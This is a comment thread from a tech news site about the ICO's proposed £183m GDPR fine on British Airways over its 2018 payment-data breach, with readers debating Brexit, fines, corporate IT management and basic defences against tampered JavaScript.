back to article UK privacy watchdog threatens British Airways with 747-sized fine for massive personal data blurt

The UK Information Commissioner's Office has warned British Airways it faces a whopping £183.39m fine following the theft of customer records from its website and mobile app servers. The record-breaking fine - more or less the lower end of the price of one of the 747-400s in BA's fleet - under European General Data Protection …

  1. Doctor Syntax Silver badge

    "BA and the other regulators now have 28 days to make representations to reduce the fine."

    Why would the other regulators want to reduce it?

    On the wider issue I can imagine a few penny-pinching manglements and boards having this report thrust in their faces by their underlings this morning.

    1. Ken 16 Silver badge
      Childcatcher

      GDPR-exit

      No reason for Spain or Ireland to ask, but come November the UK Data Protection rules might drop the level for fines.

      1. Phil O'Sophical Silver badge

        Re: GDPR-exit

        come November the UK Data Protection rules might drop the level for fines.

        There's no reason to think so.

        If UK businesses want to continue to do business with EU companies they will have to maintain GDPR-level data protection after Brexit, just as other non-EU states like the US have to.

        Before GDPR the UK already had higher maximum fines (£500,000) than either France or Germany (€300,000), indeed UK consumer protection legislation is consistently better than the EU minimums.

        1. Claverhouse

          Re: GDPR-exit

          If UK businesses want to continue to do business with EU companies they will have to maintain GDPR-level data protection after Brexit, just as other non-EU states like the US have to.

          .

          Who says the British will WANT to do business with EU people after Brexit ? The whole point is to stride bravely forth into the Atlantic, casting all ties behind, and having nothing to do with those dodgy foreigners and their beastly regulation.

          .

          Aside from that I can easily see Boris impulsively having a bonfire of all regulations in an excess of Bullingdon Daily Telegraph libertarian zeal, not even noticing what this one was for. This is a person who, after all, deliberately lied about EU regulations in his columns, as he cheerfully admitted, in order to stir up dislike and have fun.

        2. Alan Brown Silver badge

          Re: GDPR-exit

          "Before GDPR the UK already had higher maximum fines (£500,000) than either France or Germany (€300,000), indeed UK consumer protection legislation is consistently better than the EU minimums."

          There's a difference between having them on paper and actually enforcing them.

        3. ocflyfish

          Re: GDPR-exit

          "If UK businesses want to continue to do business with EU companies they will have to maintain GDPR-level data protection after Brexit, just as other non-EU states like the US have to."

          Don't be so sure on this. Most of the US-based SMBs have laughed/scoffed/ignored the EU directives on collection of VAT and will likely do the same with GDPR. Don't get me wrong, large multinational corporations will probably comply. But the 29.7 million small businesses here will likely politely tell the ICO to stuff it.

        4. LewisCowles1986

          Re: GDPR-exit

          Why are you comparing minimum fines with maximum fines. That's like saying my boss pays me well, I'm on £5 an hour, he's on £100 a second.

          Also £500,000 is a tiny fine for any moderately sized business. The point should be to make the fine high enough to cause damage, whilst low enough to not make the company go bust, as you cannot learn from mistakes that kill

          In any case it's valuing the impacted at < £500 per-person.

      2. Doctor Syntax Silver badge

        Re: GDPR-exit

        Several factors to consider here.

        Firstly< offences committed after GDPR applied up until 31st Oct will presumably have to be dealt with under GDPR, just as offences committed pre-GDPR but dealt with after GDPR applied were fined under the old regulations.

        Secondly, if HMG wants to avoid problems for businesses which need to process data of EU residents then they'll need to achieve equivalence which means keeping GDPR-equivalent regulation in place. Whether such sanity will prevail is anybody's guess.

        Thirdly, the current DPA implements GDPR so if the numpty in residence, whoever he may be, doesn't like that he'll have to replace it or repeal it.

        Fourthly, post-Brexit, I presume any fines won't be shared with other EU countries so they may be less to take into account of fines which an EU regulator might apply. Alternatively the maximum sum of EU & UK fines could be 8%. That should make boards think.

      3. 0laf Silver badge
        Thumb Up

        Re: GDPR-exit

        It's been made pretty explicit that the UK will maintain compliance with the GDPR in order to keep exchanging data with the EU.

        That might change over the few years as the USA gradually takes us over.

        It's actually great that a company is really getting hit with a real stinker of a fine. It'll sharpen up practices across the board I hope.

        1. Ken 16 Silver badge

          Re: GDPR-exit

          I wasn't suggesting that the regulations will change and as you say, the UK want to maintain equivalency of regulation. I was suggesting that although the requirements may remain the same, there's an option to drop the penalties for breaching them.

          1. Anonymous Coward
            Anonymous Coward

            Re: GDPR-exit

            The penalties are part of the regulations. See, I'm rather sure the EU would notice keeping the same data handling constraints, but with a nudge and a wink as maximum penalties.

          2. Prst. V.Jeltz Silver badge

            Re: GDPR-exit

            come November the UK Data Protection rules might drop the level for fines.

            Your statemant implies we are imposing higher fines as an EU requirement , how could you then possibly discard that requirement and still "maintain equivalency of regulation"

            if that was negotiable we could drop them now , and who wants them lowered anyway?

            1. 0laf Silver badge

              Re: GDPR-exit

              I imagine quite a few large buinesses who hold huge quantities of personal information on systems and services that have been deliberately starved of resources to maintain them adequately will be very keen to see fine watered down.

              I'm sure Boris will be keen to help since that naughty EU was hardly a friend to business. Much rather we have a US style system where privacy is largely illusary unless you have money to take everyone to court making citizens a resource and a commodity increasing GDPR.

      4. Moog42

        Re: GDPR-exit

        Nope. Can't maintain adequacy on that basis.

        Numbers differ, but I've heard that UK trade impacted by personal data is in the range of 44%. Not sure impacting that would be in the interests of either side of the Brexit fence.

      5. cynic56
        Unhappy

        Re: GDPR-exit

        Why? I'm sure that I read that American 3-letter agency and general 'we own the world' attitude meant that Safe Harbour was dead and no-one would deal with the US corporate data harvesters because it was now illegal. My arse! All I have seen is an unremitting wave of business to AWS and Microsoft cloud.

        Oh and by the way, stop correcting 'harbour' to the incorrect 'harbor' . I am still on the side of the pond that can spell proper (like).

  2. Anonymous Coward
    Anonymous Coward

    What goes around comes around....

    From: IAG GBS Communications <iaggbs.communications@iaggbs.com>

    Sent: 21 June 2019 14:48

    To: DG IAG GBS Global Operations <DG.IAGGBS.Global.Operations@iaggbs.com>

    Subject: ★ IAG GBS MC Update ★

    IAG GBS MC Update

    Dear IAG GBS Team,

    You will have seen the announcement today from Willie announcing the new IAG CIO appointment of John Gibbs, who joins IAG on September 2nd from Rolls Royce.

    This is a new direction for IT and shows how critical IT strategy is across the Group. The emphasis of bringing all IT activities under one area including Digital is the next step in the evolution of Group IT.

    Bill Francis made it clear to me at the end of 2018 that he planned to retire at the end of 2019 and hence why we commenced a recruitment process. I would personally like to thank Bill for all his dedication and determination to get us ready for the future. Bill has done a fantastic job ensuring we are ready to transition to the cloud, whilst exploring and utilising the latest technologies.

    Bill said “After 40 years in the travel industry, with 22 of those at BA and more recently IAG, I have thoroughly enjoyed my time working with all colleagues across the Group.

    Change and transformation have always been at the top of my agenda, and whether that was introducing the new mixed fleet cabin crew for BA or creating Group IT within IAG, I hope that I have been able to make a positive difference”.

    Regards,

    Steve Gunning

    Director of IAG GBS

    1. werdsmith Silver badge

      Re: What goes around comes around....

      What comes and goes I imagine is a fairly sizeable wodge of cash and a final salary scheme.

      I'm sure he's not too troubled.

      It will be ordinary BA employees that pay the price.

    2. Anonymous Coward
      Anonymous Coward

      Re: What goes around comes around....

      Is it me or does that note read like the outgoing head of Group IT was an Airline Ops guy, not an IT guy?

      Reading between the lines it seems like a Ops transformation guy was put in charge of creating/transforming Group IT?

      Anyone wiser in the ways of IAG care to comment?

      1. Doctor Syntax Silver badge

        Re: What goes around comes around....

        "Is it me or does that note read like the outgoing head of Group IT was an Airline Ops guy, not an IT guy?"

        Should it surprise anyone? It's the management attitude that a good manager doesn't need to know anything about what they're managing. That's why we get to call them manglement.

        1. CrazyOldCatMan Silver badge

          Re: What goes around comes around....

          a good manager doesn't need to know anything about what they're managing

          As long as they have good people that do know and that the manager trusts then they really don't. Good management isn't (generally) about knowledge - it's about people skills and process skills.

          (Of course, people skills are probably the reason why there are very few good IT people in senior management since good IT skills and abilities seem to be the opposite of skills required to reach senior management..)

          1. nematoad Silver badge

            Re: What goes around comes around....

            "...good IT skills and abilities seem to be the opposite of skills required to reach senior management..."

            I don't know about that. Try working on a site that has the ability to blow the nearby town into the next county, with process operators more interested in keeping the place safe than why the computer won't do what it needs to do and is thus pretty upset with IT and the IT department in general and is in no mood to wait or be fobbed off.

            I did that as a desktop support person and believe me a having a 17 stone Scot raging at you as to why you can't fix the computer NOW needs a lot of people skills. If you had said skills most of the guys were fine once you explained what needed to be done and what you proposed to do about it. Same with senior management. The trouble was with the middle layers. Noisy, demanding and cursed with a minuscule amount of "computer literacy" those were the ones to avoid if at all possible. Dealing with them meant you really got a "people skills" workout as well as developing techniques for controlling blood pressure, temper etc.

            So yes, you don't get to develop arse-licking and back-covering but that again this is top brass we are talking about and I reckon those skills would only qualify you for a middle level job.

      2. Anonymous Coward
        Anonymous Coward

        Re: What goes around comes around....

        How often have you met an IT director who knows much about IT? They're either parachuted in from another area or they're former devs /admins who - after suitable brown nosing ground work - were promoted out of harms way and managed to continue that for years.

      3. werdsmith Silver badge

        Re: What goes around comes around....

        Is it me or does that note read like the outgoing head of Group IT was an Airline Ops guy, not an IT guy?

        I think he was head of "Inflight Experience" which means he was chief cabin crew.

        1. CrazyOldCatMan Silver badge

          Re: What goes around comes around....

          he was chief cabin crew

          Exits are here, here and here.

          *My* exit is over there - the one with the big bucket of cash waiting for me. Just think of all the fake tan I can buy!

    3. Annihilator
      Coat

      Re: What goes around comes around....

      "You will have seen the announcement today from Willie announcing the new IAG CIO appointment of John Gibbs, who joins IAG on September 2nd from Rolls Royce."

      Ha! Willie...

  3. Anonymous Coward
    Anonymous Coward

    disappointed in the fine because it cooperated fully

    well, that's why it is REDUCED (and going to be watered down more and more until the public lose interest, and in 5 years time, they'll have reduced it to 1 million, it'll be quietly paid). But hey, they had to write SOMETHING in the meantime. They're disappointed.

  4. nematoad Silver badge
    Unhappy

    Wait and see.

    "...had found no evidence that the stolen cards were used"

    Yet.

    1. Gordon 10

      Re: Wait and see.

      tbf I would expect most of the cards to be used pretty quickly. Once a card is known to have been leaked you can pretty much expect it to be cancelled.

      The cynic in me does wonder if they asked their customers or looked for evidence that the cards had been used.

      1. Anonymous Coward
        Anonymous Coward

        Re: Wait and see.

        My wife was one of the cards compromised - to be honest BA were quicker to respond than the bank. They advised us to cancel the cards after a day or so, at which point the bank asked us why we were needing replacements. Then the bank got in touch a couple of weeks later to say if we hadn't already, we should get them replaced.

        BA also provided a 12 month subscription to one of the credit reference agencies for free as well.

        1. jms222

          Re: Wait and see.

          > BA also provided a 12 month subscription to one of the credit reference agencies for free as well

          and paid you for the privilege I hope since they now get to grab even more of your data. What happens if somebody you want to borrow from happens to use only the _other_ credit reference shits instead ?

          1. Anonymous Coward
            Anonymous Coward

            Re: Wait and see.

            Not quite sure how using the credit reference agencies helps BA grab more data?

            But yes, seeing as how I have a perfect score in one agency and a mid tier score in another, I do wonder about things like that.

            1. Phil O'Sophical Silver badge

              Re: Wait and see.

              Not quite sure how using the credit reference agencies helps BA grab more data?

              Those agencies don't operate for free, and if you're not paying them someone else must be. That someone else will want to get something in return. Your data is the obvious coin.

              As always, if you're not paying for the product, you are the product

              1. Doctor Syntax Silver badge

                Re: Wait and see.

                "if you're not paying them someone else must be"

                In this particular case the someone else was BA. The data was just a bonus.

        2. Gonzo wizard

          "BA were quicker to respond than the bank"

          According to this post on twitter - https://twitter.com/musalbas/status/1148145302328815617 - by the person who originally discovered the issue, BA sat on a GDPR request asking why personal details were being leaked for 30 days before responding, removing the dodgy tracking code on the same day. I bet your bank didn't sit on this for 30 days, did they?

          It also explains why the ICO says the incident started at the end of June while BA told them it started in August.

          1. Anonymous Coward
            Anonymous Coward

            Re: "BA were quicker to respond than the bank"

            We got the response from BA about 3 or 4 days after the news found out - then 2-3 weeks later for the bank. So not especially quickly.

    2. Anonymous Coward
      Anonymous Coward

      Re: Wait and see.

      I can almost guarantee the stolen card details were used.

      One of our company credit cards was used fraudulently just after the hack period ended, having been used to make a purchase on the BA website during the hack period. It wasn't used to make purchases on many other sites and certainly none of the others looked to be breached.

      Luckily Barclaycard flagged the transaction and we cancelled the card before any damage was done.

    3. macjules

      Re: Wait and see.

      Can and have provided evidence to BA and Met police that 2 cards - my business credit card and my wife’s personal card - were cloned after having purchased flights from BA within the fraud timeline.

      To date I have not received any offers of ‘credit worthiness tracking’ or compensation from BA and I only received the standard round-robin email that they sent out. Costs incurred were time on phone to card company plus having to arrange fast replacements when the fraud became apparent which I billed at 2 hours work. To date my invoice to BA for £350 + VAT remains unpaid.

      1. Doctor Syntax Silver badge

        Re: Wait and see.

        "To date my invoice to BA for £350 + VAT remains unpaid."

        Add interest and then go to the small claims court. If they still don't pay having a bailiff distrain a 747 should be interesting and get their attention.

        1. macjules

          Re: Wait and see.

          I want an A320 - no Boeing crap for me. Failing that Terminal 5 will do nicely.

    4. Anonymous Coward
      Anonymous Coward

      Re: Wait and see.

      "...had found no evidence that the stolen cards were used"

      This kind of BS triggers me everytime !

      Of course, genius, whoever uses those cards numbers is not gonna put it in the public press ! and eventhough it is reported, you can always feel free to look the other way.

      FFS, why even is this nonsense reported ?

      1. tip pc Silver badge

        Re: Wait and see.

        i assume the card processors, issuers or BA's insurance have reported back to BA that the cards haven't been used fraudulently as a result.

    5. LewisCowles1986

      Re: Wait and see.

      What is their fee from Visa / Mastercard for this? AFAIK Visa can charge 4.5k per person per incident per-day

  5. DaLo

    Oh that'll be a nice bit of compensation for the customers whose data was taken due to security failings.

    Doesn't help with the amount of anguish knowing you are just a moment away from being the victim of identity theft and having to once again change your card details and keep constantly vigilant for unauthorised loan applications. However £378 goes a little way towards easing the pain.

    ...wait, what was that?

    You're saying the people whose data got stolen don't get any of it and the money all goes into the general taxation pot?

    Well that sucks.

    1. adam 40

      Just another tax

      I completely agree, all these fines do nothing to compensate the victims of the theft.

      The companies just carry on regardless, the government fines them, and the public are shafted.

      1. Anonymous Coward
        Anonymous Coward

        Re: Just another tax

        "The companies just carry on regardless, the government fines them, and the public are shafted."

        Yes...the government adds the fines to their big pile of money and never release it back to pay for any services used by taxpayers.

        Is it fair for those directly affected? Probably not but at the same time proving they were affected may be difficult based on the stories of affected people with banks blocking transactions and a significant number of the cards being replaced quickly.

        The company fine goes towards the "public good" and those directly affected benefit more than if they employed lawyers to go after the company directly. Which is good for everyone but the lawyers...

  6. Warm Braw

    Scripts are often used to support marketing and data tracking functions

    You would hope that fines such as these would help companies quantify the cost of gathering the information they "have to have" on their marketing activities.

    However, I suspect the typical response will be to sack a few developers who were required to provide the tracking, then sack a few more who refuse to take on the future responsibility, then carry on exactly as before. As in the crypto "debate", the ability of people in power to demand two mutually-exclusive things simultaneously shows no sign of faltering.

    1. Doctor Syntax Silver badge

      Re: Scripts are often used to support marketing and data tracking functions

      I'd like to think they'll also evaluate their policies re opt-in/opt-out.

      E.g. this morning I tried to phone Hotpoint spares. Their pre-recorded rigmarole was that we might spamyou with post or phone unless you opt-out. That's a breach of GDPR right there. I didn't get as far as opting out, however; I gave up on their appalling ACD.

      1. Alan Brown Silver badge

        Re: Scripts are often used to support marketing and data tracking functions

        "Their pre-recorded rigmarole was that we might spamyou with post or phone unless you opt-out"

        Every so often I send heads-up emails about such things to the ICO. Apart from the canned responses nothing gets done and I'll invariably find that the same message is on the phone system when calling several months later.

  7. Potemkine! Silver badge

    The group is believed to have exploited third party scripts, possibly modified JavaScript, running on BA's site to gain access to the airline's payment system.

    Noscript rulz!

    When a website doesn't work with noscript on because it uses 3rd party javascript then I try to find an alternative. and the original website looses a customer.

    1. mikeo

      Great solution

      ...for 0.2% of people.

      1. Doctor Syntax Silver badge

        Re: Great solution

        Therein lies a problem. If a sufficient number were knowledgeable enough to use blockers there's be a sort of herd immunity in that the site owners would have to make a choice between tightening up or losing custom.

        1. mikeo
          Stop

          Re: Great solution

          "If a sufficient number..."

          Which is highly unlikely to ever happen. Ever asked a non-techie to use NoScript? Hard enough convincing them to use unique passwords and patch their shit which is of far greater benefit. Blocking scripts, while interesting and useful in some cases, is not a workable solution.

          1. Doctor Syntax Silver badge

            Re: Great solution

            "Blocking scripts, while interesting and useful in some cases, is not a workable solution."

            It is for those who use it.

            1. Anonymous Coward
              Anonymous Coward

              Re: Great solution

              no, blocking scripts is not a workable solution for certain scenarios, and I hate to say this, because I use half a dozen (or more) ad blockers, on top of scrip-blocking. But when I buy (not search for!) an airline ticket, or any other product or service online, I go to the old ugly IE. I just don't have time / patience to chase my bank or shop over the phone, when my payment, put through well-defended firefox, comes up with an "oops, something went wrong" page.

              1. 0laf Silver badge
                FAIL

                Re: Great solution

                Yep awful but true.

                Banking websites as well. Many unusable without turning off script and tracking blockers.

    2. Elregouk

      What planet do you all live on? Javascript is a part of the modern internet. Fucking get a grip. Put your tinfoil hats away

      1. Anonymous Coward
        Anonymous Coward

        We live in a place where we pick what we like to be exposed to and what actions we do that will affect our lives, like what to eat, who to meet, and which javascript to load.

        Unlike the common people like you who just blindly put their trust on random strangers and hope you don't get F*cked and Gripped, when in reality real people are getting F*cked and Gripped for the very same mistake.

        1. Elregouk

          Common people?? Arrogant wanker.

  8. Vivid Professional

    BA dont have any B747-8's.............. They have B747-436's but defo not a B747-8

  9. MJB7

    GDPR

    Ah-ha! Now we start to see cases actually *under* GDPR. If the fine goes through at anything like this level, boards are going to start paying rather more attention to whether they actually need that data, and if so, how to protect it.

  10. Anonymous Coward
    Anonymous Coward

    Good

    Let this be a lesson to all large companies. Put money into securing your shit, or we'll take it off you as a massive penalty when you allow yourself to be hacked, and you won't get a bonus!

    1. Fred Dibnah

      Re: Good

      I'm pretty sure bonuses and dividends will be unaffected.

      1. Anonymous Coward
        Anonymous Coward

        Re: Good

        Bonuses - hell no.

        Dividends - likely, though not included in the latest dividend (£700M paid today, by the way...) since nothing has been fined yet. If that £183M needs to be paid in a later day, it will affect the dividend and probably the stock price as well.

        Year-over-year the stock has lost almost 40% of its value, which may make some investors tad nervous. This tanking probably has very little to do with this data blurt, but heads may roll in any case.

  11. codejunky Silver badge

    Hmm

    The data was stolen from BA. BA have been stolen from and now they will be fined for being the victim of theft. Cooperating with the investigation and the attackers seem to be known as a criminal group who do this.

    Just reads a little odd. Maybe BA did bad. But I must have missed that bit.

    1. Phil O'Sophical Silver badge

      Re: Hmm

      It's not a question of blame, or victim/thief, it's purely one of responsibility. BA took its customers' data and failed to protect it adequately. The buck stops with them, and they get the fine.

      1. 0laf Silver badge
        Mushroom

        Re: Hmm

        Eh?

        If a bank took your valuables, charged you for the privilege of having an account to store these things and then left the safe door open letting evreything be stolen one evening would you be thinking "aw poor bank they didn't mean it to happen, never mind about my precious things you look sad". I don't think so.

        As someome else has pointed out if you do everything you should have done and data is still stolen from you then in all likelyhood you will not be fined by the ICO.

        BA were incompetent and thoroughly deserve a multimillion £ kick in the nads. I'd also add IMHO they are bloody incompetent as an airline as well.

    2. STOP_FORTH Silver badge
      Facepalm

      Re: Hmm

      BA dun incompetent. If BigCo wants your private data they are supposed to look after it properly. GDPR isn't hard to understand, people just find it hard to do. Or they can't be bothered.

    3. Tom 38

      Re: Hmm

      BA haven't been stolen from, because they didn't own the data that was taken. BA have been fined because they were unreliable guardians of that data.

    4. codejunky Silver badge

      Re: Hmm

      I understand the replies I am getting, that BA was to be responsible for the data. But the data can always be got to in some way or other and so anyone can be stolen from (physical or digitally) as proven every day.

      I have no problem with a fine for BA if they didnt do the expected things to protect the data (and that might be the case here, I just didnt see it) but to be fined because you were stolen from, even if its other peoples property stolen from your possession, seems harsh.

      I am not against strong protection of user data. But if we want users then data will be collected and there is always a possibility of compromise. All you can do is best practices.

      1. Tom 38

        Re: Hmm

        But if we want users then data will be collected and there is always a possibility of compromise. All you can do is best practices.

        Which they didn't do, which is why they get the big fine, and about fucking time.

    5. Charlie Clark Silver badge

      Re: Hmm

      It's negligence: British Airways failed to protect customers' personal data correctly.

      GDPR makes it quite clear that companies that can demonstrate that they have followed the recommendations of the data protection regulators have little to fear. In essence, GDPR limits their exposure to cases brought as a result of their behaviour, as courts can point the settlement and say: dealt with.

      By contrast look at some of the settlements across the pond. Boeing has set aside $ 100 million as compensation for the US victims of two plane crashes and Equifax is subject of at least one class action.

      However, at the end of the day, the fine sounds worse than it actually is, because it is a charge that can be offset against tax.

      1. Anonymous Coward
        Anonymous Coward

        Re: Hmm

        By contrast look at some of the settlements across the pond. Boeing has set aside $ 100 million as compensation for the US victims of two plane crashes and Equifax is subject of at least one class action

        It seems disproportionate to me. I don't know the details but it was not the case that BA took no security measures and once they knew there was an issue they did respons albeit that the measures and response may have been inadequate and/or tardy. The fine seems orders of magnitude more than reasonable and thsi is reinfirced by the comaprison with Boeing.

        Boeings provision is half teh fine against BA. It is quite clear that they designed and manufactured an aircraft which was unsafe. The issue was ,even given allowance for hindsight, of such an obvious nature it should have been identified and there is evidence that the information given to the regulator was misleading and innacurate. Hundreds of people have died as a result of this and yet the provision made is only half the amount that BA have been fined as a result of being victims of a criminal attack for which they were not responsible and in which no one was injured or likely to be injured let alone killed.

        There is a massive disconnect between these two numbers.

  12. Anonymous Coward
    Anonymous Coward

    BOAC

    Better Order Another Certificate

    1. werdsmith Silver badge

      Re: BOAC

      That certificate expired in 1974.

      1. Fred Dibnah

        BCal

        Better Call a Lawyer.

  13. MJI Silver badge

    Also worrying

    They are planning to buy some 737s.

    Best avoided then, what a fall over the years.

  14. amanfromMars 1 Silver badge

    It is almost as if it were criminal .......

    Is the fine figure .... £183.39m ..... an arbitrary confection?

    Who decided and who signed off on the figure and who will be spending the windfall and on what are always awkward questions which are hardly ever answered truthfully.

    1. Sadie

      Re: It is almost as if it were criminal .......

      It's a percentage of their Worldwide income IIRC - Maximum they can fine is 4%

      1. theblackhand

        Re: It is almost as if it were criminal .......

        "The total proposed fine of £183.39 million would be the biggest penalty ever issued by the ICO​.

        It is the equivalent of 1.5% of BA's global turnover for the financial year ending December 31 2018."

        Ref: https://www.standard.co.uk/news/uk/british-airways-fined-more-than-180m-for-customer-data-breach-a4184376.html

  15. Anonymous Coward
    Anonymous Coward

    28 days later... the fine has been reduced on appeal to £1.83 and it’s business as usual and trebles all round at BA. I hope I’m wrong.

    1. Charlie Clark Silver badge

      No need: the fine can be declared as cost and, hence, offset against tax. Someone goes for early retirement and then it's G&T's in the C-Suite later.

      More important, however, will be the precedent set by the ruling.

      1. Stu J

        Pretty sure fines aren't tax-deductible...

        Edit:

        https://www.gov.uk/hmrc-internal-manuals/business-income-manual/bim42515

        "Regulatory bodies

        Where a trader incurs a liability to a regulatory body on revenue account that is broadly intended to cover the regulator’s costs of performing its duties in relation to the trading activities, such costs will normally be allowable even where the trader has committed a breach of regulations. However, should a regulatory body impose a penalty for breach of regulations, or should a penalty or fine become payable as a result of a prosecution for a trader’s breach of regulations, this will not be an allowable expense (see McKnight v Sheppard [1999] 71TC419)."

        1. AVee
          Thumb Up

          To get a car analogy in: If you replace your tires because they are worn below the minimum thread depth, the costs of the tires are deductible, regardless of whether you replaced time on time of to (way) late. However, the fine you get for driving with worn tires is not deductible. That seems remarkably in line with common sense...

          Thank you for clearing that up, to many people here seem to think companies can just deduct fines where clearly the can't.

        2. Charlie Clark Silver badge

          For multinationals there is almost always a way. VW would have gone bankrupt by now otherwise.

  16. Yet Another Anonymous coward Silver badge

    Remember the good old days

    When BA was the one doing the hacking and then walked away free because the computer running other airline's data was on their premises and so it wasn't hacking

  17. JoeySter

    It's not entirely clear what the breach actually was. It sounds like more of a client side attack than a breach of internal data. Something as simple as HTML/HTTP browser settings?

  18. andy 103
    Facepalm

    Trivial to mitigate

    The article https://www.theregister.co.uk/2018/09/11/british_airways_website_scripts/ points out how attacks like this work.

    In essence a js file hosted on BA's own domain was modified so it posted details to a third party domain. The fact the js file could be modified on their production server is in itself scary, but how can you protect against that?

    An easy way is just to monitor the filesystem for changes to any .js file, say every hour. Perhaps diff it against the master copy in their version control. If there are differences email the entire development team as that safeguards against it being an inside job.

    A couple of mins work, save several million quid in fines and pissing off a load of (lost) customers. Too simple perhaps?!

    1. Charlie Clark Silver badge

      Re: Trivial to mitigate

      but how can you protect against that

      One of the standard setting for any webserver is that its user cannot write to any of its files so that it exists in an effectively read-only file-system. This should be standard practice as it was the goto exploit in the days of CGI.

      But that itself is not the reason for the size of the fine. There was systematic failure across the line, including on how the data was stored.

    2. Anonymous Coward
      Anonymous Coward

      Re: Trivial to mitigate

      "The fact the js file could be modified on their production server is in itself scary, but how can you protect against that?"

      Containers and immutable filesystems?

    3. Anonymous Crowbar

      Re: Trivial to mitigate

      Any kind of FIM should have picked this up.

  19. EnviableOne

    Regulations

    The GDPR wording talks about turnover of the Undertaking, which would extend to the whole of IAG, especially if IT systems are managed as a group resource.

    this would allow the fine to grow

    183m is a baby of a fine, and considering the circumsatnces, size of breach and the Blue Chip status of the BA name, not unreasonable.

  20. SVV

    Such scripts are often used to support marketing and data tracking functions or running external ads

    So they spent their time and money trying to monetise personal data, rather than trying to secure personal data. And people are moaning that they've now had to pay a fine for all the damage it caused?

    Serves them right for seeing personal data as an opportunity rather than a responsibility.

  21. Anonymous South African Coward Bronze badge

    What will happen should you make heavy use of outsourced IT and outsourced IT slips up big-time causing you to be slapped with a major GDPR breach and fine?

    1. Korev Silver badge

      I'd love to know if the "savings" from the above are greater than the fine...

      1. Anonymous Coward
        Anonymous Coward

        So called "savings" from an off shore model is a fad and only people who believe it are the excel spreadsheet experts that care about nothing else but numbers, it's rendering them good results, real question is: will they ever learn their lesson?

    2. Anonymous Coward
      Anonymous Coward

      I'd probably sak them off, I'm sure a decent contract will allow that, and possibly recover charges if they are irresponsible. Although if they lost the data would they be the ones getting the fines? The thing I like about GDPR is that it makes companies think about data where they probably have not bothered before.

    3. Anonymous Coward
      Anonymous Coward

      You pay the fine and then try to get the money back from the outsourcer(s) - good luck with that.

    4. Alan Brown Silver badge

      "... heavily outsourced IT... slips up ... major GDPR breach and fine..."

      You are the data handler, therefore you get the fine. It is YOUR responsibility to ensure the outsourcer is secure.

      This is not much different than a retailer's obligation on sale of goods, vs recovering costs from the suppliers.

      Further litigation between you and the outsourcer over the issue may or may not come under the regulators' purview, depending on how the data was handled and the contracts setup, but you can be assured that if you didn't do your due diligence in the first place you're going to get doubletapped pretty hard by the regulators up front.

  22. Anonymous Coward
    Anonymous Coward

    Should be more expensive

    Fine not high enough. Besides, no one mentions the fact that BA has outsourced their ops to off shore with the penny pinching mindset so many have, yes it's cheap but it also comes with an army of mostly short skilled people who replaced those they once used to have in house. To their management, it's working well.

    1. Charlie Clark Silver badge

      Re: Should be more expensive

      The fines are designed to be punitive but not crippling, otherwise they'd never become law.

      1. Alan Brown Silver badge

        Re: Should be more expensive

        On the other hand, if BA do it again, the fine will be larger and negotiation won't be much of an option.

        Most regulators work on the basis that the first bite is low value, but if they ever have to show up on your doorstep again then they're going to go over every inch of your business with a fine tooth comb and they won't be forgiving about what they find.

  23. SGJ

    £183 million sounds a lot...

    ... but it works out at only £366 per card (or the price of a couple of aircraft?)

  24. Anonymous Coward
    Anonymous Coward

    more or less the lower end of the price of one of the 747-400s

    Not been made for a while, a good 14 years for the passenger version. A bit more up to date journalism gives the 787-8 list price (big airlines never pay this) as $248.3M (£198.64M), makes good copy but sadly way off the mark.

    Anyhow anyone giving BA a good kicking always deserves a cigar in my book, luggage losing overbooking rude bastards.

  25. Joe Gurman

    Isn't it time....

    .... to start comparing fines to actual (not list) prices of A380s, which have pretty much become as past-tense in terms of production as the passenger versions of the 747?

  26. Greg D

    Unpopular Opinion

    This may not be popular here, but haven't we got cyber security backwards?

    Why are we fining the organisation holding data for the fact someone stole that data? The following analogy may be over-simlipfied, however, if you report your car stolen, the police tend to try and find out who stole it, and go after them for punishment. They dont turn around and fine the victim of the theft, saying that they should have better protected the vehicle.

    I know this gets a bit murky with it being other people's personal data, however hear me out... if the data was stolen from adequately protected systems, why is it the data holder (victim in this case) fault that data was stolen? They didnt steal it. They certainly didnt want it stolen.

    They obviously have some level of basic security deterrents in place, all companies do. But in IT security, they are exactly that - deterrents. They will not stop anyone who REALLY wants to get in from getting in. That's a data security pipe dream.

    Why are we not puttiing effort into identifying and punishing the perpetrators of the hack instead of the victims?

    Not to be sticking up for BA specifically here, but this has been on my mind since they came up with this whole fine companies for data breaches thing. I assumed it was meant to catch stupid fuck ups, like leaving sensitive USB sticks lying around, or laptops unlocked etc. Just seems a little backwards and gives hackers more freedoms than anything.

    1. DavCrav

      Re: Unpopular Opinion

      "The following analogy may be over-simlipfied, however, if you report your car stolen, the police tend to try and find out who stole it, and go after them for punishment. They dont turn around and fine the victim of the theft, saying that they should have better protected the vehicle."

      They didn't own the data, it was someone else's. If the 'we hold your possessions securely' storage company actually just lets anyone in and lets them take anything they want, they will be done as well.

      "They obviously have some level of basic security deterrents in place, all companies do. "

      Apparently, although I am not an expert in this, their safeguards were well below best practice, hence the fine.

    2. MrSeaneyC

      Re: Unpopular Opinion

      You would have a point, if the data was stolen from adequately protected systems. As it was, this is not the case. IMHO running unchecked 3rd party code on your payment pages is completely negligent. Personally I think the fine should be much bigger than this given BA’s unbelievably arrogant stance (“The details weren’t used for fraudulent transactions” - Err, yes they were, plenty of people who only used their card on BA having it cloned within the affected period) and the fact it will obviously be batted down through the process.

    3. Sandtitz Silver badge

      Re: Unpopular Opinion

      "if you report your car stolen, the police tend to try and find out who stole it, and go after them for punishment. They dont turn around and fine the victim of the theft,"

      The victim owned the car and was responsible to the owner - himself. You can't sue yourself. (not sure about USA...)

      "saying that they should have better protected the vehicle."

      Oh, most plods, will state the obvious that to the victim...

      "They obviously have some level of basic security deterrents in place, all companies do. But in IT security, they are exactly that - deterrents. They will not stop anyone who REALLY wants to get in from getting in. That's a data security pipe dream."

      So... since nothing can be secured 100%, why bother at all with security?

      The question here is whether there were reasonably good safeguards against data theft. The nature of theft has not been discussed but hopefully an inquiry into this will enlighten us whether BA had the equivalent of Fort Knox for customer information storage; if all data was stored in an unpatched XP in the cupboard, or something inbetween.

      If the safeguards were adequate, encryption everywhere, hashed passwords, everything PCI DSS compliant etc, the fines may be lowered or canceled. They haven't been fine yet.

      "Why are we not puttiing effort into identifying and punishing the perpetrators of the hack instead of the victims?"

      Who says that no effort has been done to identify the perps? The problem with many digital heists is the lack of evidence if the perps have known how to hide their traces.

      1. Frau Blücher

        Re: Unpopular Opinion

